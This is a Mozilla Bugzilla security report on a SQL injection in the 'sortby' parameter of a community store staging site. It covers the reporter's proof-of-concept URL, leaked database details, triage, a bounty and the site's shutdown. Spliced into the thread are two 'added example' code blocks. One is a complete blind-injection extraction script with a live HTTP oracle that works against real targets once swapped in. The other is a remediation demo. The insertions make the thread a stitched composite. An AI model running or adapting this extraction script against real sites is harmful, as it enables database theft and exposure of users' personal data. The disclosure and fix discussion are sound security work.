Closed Bug 650105 Opened 13 years ago Closed 13 years ago

community-store.authstage.mozilla.com SQL Injection

Categories

(Websites :: communitystore.mozilla.org, defect)

defect
Not set
normal

Tracking

(Not tracked)

VERIFIED WONTFIX

People

(Reporter: luca.defulgentis, Unassigned)

References

Details

(Whiteboard: [infrasec:sqlinject][ws:critical])

User-Agent:       Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.04 (lucid) Firefox/3.6.13
Build Identifier: 

Hello Mozilla,
I found a SQL injection in the "community-store.authstage.mozilla.com" web application. I was able to exploit the injection via the "sortby" parameter and read MySQL variable values. The following is a proof-of-concept exploit that I used to infer the length of the database() variable: if the system variable is 21 bytes long, then the "(select 1 union select 2)" statement is executed, triggering an application error. Otherwise no error message is displayed.

https://community-store.authstage.mozilla.com/admin/review?order=asc&sortby=+if(length(database())=21,(select+1+union+select+2),type)

I'm also reporting some variables' values inferred thanks to the described method:

user()     => commstore@10.2.81.29 
version()  => 5.0.77-log
database() => community_store_stage

Thank you,
Luca De Fulgentis

Reproducible: Always
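The inference method in the report, as an added example that is not part of the bug or of the community_store code. The report's payload is spliced into ORDER BY, and MySQL only evaluates the multi-row subquery when the IF() condition is true, at which point the query fails ("Subquery returns more than 1 row"). The application error therefore acts as a one-bit oracle; binary search over that bit recovers a string's length and then each character. The SimulatedOracle below is a constructed stand-in that answers as a server holding the values listed in the report would, so the script runs offline; http_oracle assumes the `?order=asc&sortby=` layout from the report's URL and is not exercised here.

```python
"""Error-based blind inference through an ORDER BY injection point (added example)."""
import re
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Dict

Oracle = Callable[[str], bool]  # sortby value -> True when the application errored


def build_payload(condition: str, fallback_column: str = "type") -> str:
    """Same shape as the report's payload; the UNION subquery is what raises the error."""
    return f" if({condition},(select 1 union select 2),{fallback_column})"


def length_condition(expr: str, op: str, n: int) -> str:
    return f"length({expr}){op}{n}"


def char_condition(expr: str, pos: int, op: str, code: int) -> str:
    # Compare the 1-based character by its code point so the payload needs no quotes.
    return f"ord(substring({expr},{pos},1)){op}{code}"


def _search(greater_than: Callable[[int], bool], lo: int, hi: int) -> int:
    """Binary search: smallest v in [lo, hi] for which greater_than(v) is False."""
    while lo < hi:
        mid = (lo + hi) // 2
        if greater_than(mid):
            lo = mid + 1
        else:
            hi = mid
    return lo


def infer_length(oracle: Oracle, expr: str, max_len: int = 256) -> int:
    return _search(lambda v: oracle(build_payload(length_condition(expr, ">", v))), 0, max_len)


def infer_string(oracle: Oracle, expr: str) -> str:
    n = infer_length(oracle, expr)
    chars = []
    for pos in range(1, n + 1):
        code = _search(lambda v: oracle(build_payload(char_condition(expr, pos, ">", v))), 0, 255)
        chars.append(chr(code))
    return "".join(chars)


class SimulatedOracle:
    """Constructed stand-in for the target (no network): evaluates the payloads this
    script builds against fixed values for the MySQL functions being probed."""

    _LEN = re.compile(r"length\((\w+\(\))\)(>|<|=)(\d+)")
    _CHR = re.compile(r"ord\(substring\((\w+\(\)),(\d+),1\)\)(>|<|=)(\d+)")

    def __init__(self, values: Dict[str, str]):
        self.values = values
        self.requests = 0  # cost of the extraction, one HTTP request per oracle call

    def __call__(self, sortby: str) -> bool:
        self.requests += 1
        m = self._LEN.search(sortby)
        if m:
            lhs, op, rhs = len(self.values[m.group(1)]), m.group(2), int(m.group(3))
        else:
            m = self._CHR.search(sortby)
            if not m:
                raise ValueError(f"simulator does not understand payload: {sortby!r}")
            s, pos = self.values[m.group(1)], int(m.group(2))
            lhs = ord(s[pos - 1]) if pos <= len(s) else 0  # MySQL: ORD('') is 0
            op, rhs = m.group(3), int(m.group(4))
        return {">": lhs > rhs, "<": lhs < rhs, "=": lhs == rhs}[op]


def http_oracle(base_url: str, error_marker: str) -> Oracle:
    """Oracle for a live endpoint (assumed layout from the report's URL). The app is
    taken to have errored when the response is 5xx or contains error_marker."""
    def ask(sortby: str) -> bool:
        url = base_url + "?" + urllib.parse.urlencode({"order": "asc", "sortby": sortby})
        try:
            with urllib.request.urlopen(url, timeout=15) as resp:
                return error_marker in resp.read().decode("utf-8", "replace")
        except urllib.error.HTTPError as err:
            return err.code >= 500 or error_marker in err.read().decode("utf-8", "replace")
    return ask


REPORTED = {  # values the report lists; they only feed the simulator
    "user()": "commstore@10.2.81.29",
    "version()": "5.0.77-log",
    "database()": "community_store_stage",
}

if __name__ == "__main__":
    sim = SimulatedOracle(REPORTED)
    for expr in REPORTED:
        print(f"{expr:11} => {infer_string(sim, expr)}")
    print(f"{sim.requests} oracle calls")
```

Each recovered character costs about eight requests, so the three values in the report take a few hundred requests; against a real target the only change is swapping SimulatedOracle for http_oracle with a marker taken from the application's error page.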
Whiteboard: [infrasec:sqlinject]
Thanks for the report Luca. We're working to resolve the issue.

Vulnerable code in upload.class.php L135

http://viewvc.svn.mozilla.org/vc/projects/community_store/trunk/models/upload.class.php?revision=29816&view=markup
Status: UNCONFIRMED → NEW
Component: www.mozillaonline.com → communitystore.mozilla.org
Ever confirmed: true
OS: Linux → All
QA Contact: www-mozillaonline-com → communitystore-mozilla-org
Hardware: x86 → All
Whiteboard: [infrasec:sqlinject] → [infrasec:sqlinject][ws:critical]
Admin page is turned off. This issue has been resolved. Please open a new bug to verify the security patch changes if the admin will be re-enabled.
Status: NEW → RESOLVED
Closed: 13 years ago
Resolution: --- → FIXED
Blocks: 627082
A review of the supplied SQL file for the site shows that the following information stored in the tables would be available to an attacker:
email, firstname, lastname, ip_address

I've left out the other fields/bits that don't have a privacy impact in my opinion. Even if a user selects the "anonymous" option, the data supplied for email/firstname/lastname is inserted into the DB.

The injection is in a SELECT statement query(), which prevents multiple queries (INSERT, DELETE, UPDATE, etc.) by design. However, an attacker can still use subqueries and call MySQL functions as demonstrated above.
community-store isn't on our bounty list, but this is exposing PII and (along with other bugs) prompted us to shut down the site so we're going to award this one $1000
All: bug 627082 is the tracking bug for all of the related community store security bugs. I emailed Silver Orange to find out if they have availability to do the code fixes. Most of the fixes will require changing from dynamic SQL statements to parametrized statements in the PHP code. If Silver Orange is not available, I will talk to Fred about the availability of any Flux developers.

Thanks,
cmore
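The remediation point above, as an added example (Python with sqlite3, not the community_store PHP code). The sink in the report is a column name spliced into ORDER BY, and prepared statements bind values, not identifiers: `ORDER BY ?` sorts by a constant instead of rejecting the input, so the fix for a sort key is an allowlist from request parameter to column. SQLite has no IF() and tolerates a multi-row scalar subquery, so the probe here uses the other channel an attacker has at this sink, the row order itself flipping with the injected condition. The table and rows are constructed sample data.

```python
"""ORDER BY injection: why parameter binding does not help, and the allowlist that does (added example)."""
import sqlite3
from typing import List

ROWS = [  # (id, type, name, ip_address); constructed sample data
    (1, "icon", "zebra.png", "10.0.0.1"),
    (2, "theme", "apple.zip", "10.0.0.2"),
    (3, "icon", "mango.png", "10.0.0.3"),
]


def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("create table uploads(id integer, type text, name text, ip_address text)")
    con.executemany("insert into uploads values (?, ?, ?, ?)", ROWS)
    return con


def vulnerable_query(sortby: str, order: str) -> str:
    """Shape of the original sink as the report describes it: request input concatenated into ORDER BY."""
    return f"select id, type, name from uploads order by {sortby} {order}"


def probe(con: sqlite3.Connection, condition: str) -> bool:
    """Boolean inference through ordering: ids come back ascending iff `condition` holds.
    The condition may be any subquery, e.g. over ip_address, which the SELECT never returns."""
    payload = f"case when {condition} then id else -id end"
    ids = [r[0] for r in con.execute(vulnerable_query(payload, "asc"))]
    return ids == sorted(ids)


def bound_identifier_is_ignored(con: sqlite3.Connection) -> bool:
    """Binding the column name as a parameter does not sort by that column."""
    try:
        names = [r[0] for r in con.execute("select name from uploads order by ? asc", ("name",))]
    except sqlite3.Error:
        return True  # rejected outright, which is still not the sort the caller asked for
    return names != sorted(r[2] for r in ROWS)


SORT_COLUMNS = {"id": "id", "type": "type", "name": "name"}  # request key -> real column
ORDERS = {"asc": "ASC", "desc": "DESC"}


def safe_query(sortby: str, order: str) -> str:
    """Only allowlisted identifiers reach the SQL text; anything else is rejected, not escaped."""
    try:
        column, direction = SORT_COLUMNS[sortby], ORDERS[order.lower()]
    except KeyError:
        raise ValueError(f"unsupported sort parameters: sortby={sortby!r} order={order!r}") from None
    return f"select id, type, name from uploads order by {column} {direction}"


def safe_rejects(sortby: str) -> bool:
    try:
        safe_query(sortby, "asc")
        return False
    except ValueError:
        return True


def sorted_ids(con: sqlite3.Connection, sortby: str, order: str) -> List[int]:
    return [r[0] for r in con.execute(safe_query(sortby, order))]


if __name__ == "__main__":
    db = make_db()
    print("ip leaks via row order:", probe(db, "(select ip_address from uploads where id=1) like '10.0.%'"))
    print("ORDER BY ? sorts by the bound column:", not bound_identifier_is_ignored(db))
    print("allowlist blocks payload:", safe_rejects("case when 1 then id else -id end"))
    print("allowlist, name desc:", sorted_ids(db, "name", "desc"))
```

The values in the WHERE part of the review query (if any) still belong in bound parameters; the allowlist covers only the identifiers and keywords that binding cannot express.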
The communitystore was only temporarily shut down. We are in the process of evaluating the pros and cons of fixing the security issues. This bug should stay open until that decision has been made. The website is only redirected and has not been officially EOL'd.

Thanks,
Chris
Status: RESOLVED → REOPENED
Resolution: FIXED → ---
As per bug 657516, communitystore has been taken down. Changing this issue to RESOLVED.
Status: REOPENED → RESOLVED
Closed: 13 years ago
Resolution: --- → FIXED
Please validate that this code has a note about this vulnerability in case somebody wants to use it for another purpose.
Group: websites-security
Status: RESOLVED → VERIFIED
Resolution: FIXED → WONTFIX
Flags: sec-bounty+